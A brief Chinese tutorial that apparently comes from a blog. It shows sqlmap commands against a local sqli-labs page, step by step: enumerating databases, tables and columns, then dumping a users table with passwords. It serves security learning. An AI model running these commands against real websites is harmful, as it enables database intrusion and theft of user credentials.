sqlmap是一款强大的自动注入工具
我下载的是python2版本
用法:
1.
-u 是指向url
eg: python2 sqlmap.py -u “http://127.0.0.1/sqli/Less-1/?id=1” 扫描了解数据库信息
2.爆数据库名字
eg: python2 sqlmap.py -u “http://127.0.0.1/sqli/Less-1/?id=1” --dbs
假如爆出来的数据库名字是abcd
3.继续爆表名
eg: python2 sqlmap.py -u “http://127.0.0.1/sqli/Less-1/?id=1” -D abcd --tables
出来的表名字是users
4.继续爆字段
eg: python2 sqlmap.py -u “http://127.0.0.1/sqli/Less-1/?id=1” -D abcd -T users --columns
爆出来的字段是id,users,password
5.继续爆数据
eg: python2 sqlmap.py -u “http://127.0.0.1/sqli/Less-1/?id=1” -D abcd -T users -C id,users,password --dump
注意:html里面是不可能存在有sql漏洞,因为没有交互和动态。(大多是后缀为.php,.asp,.jsp这些)
sqlmap使用方法
最新推荐文章于 2024-04-11 06:40:06 发布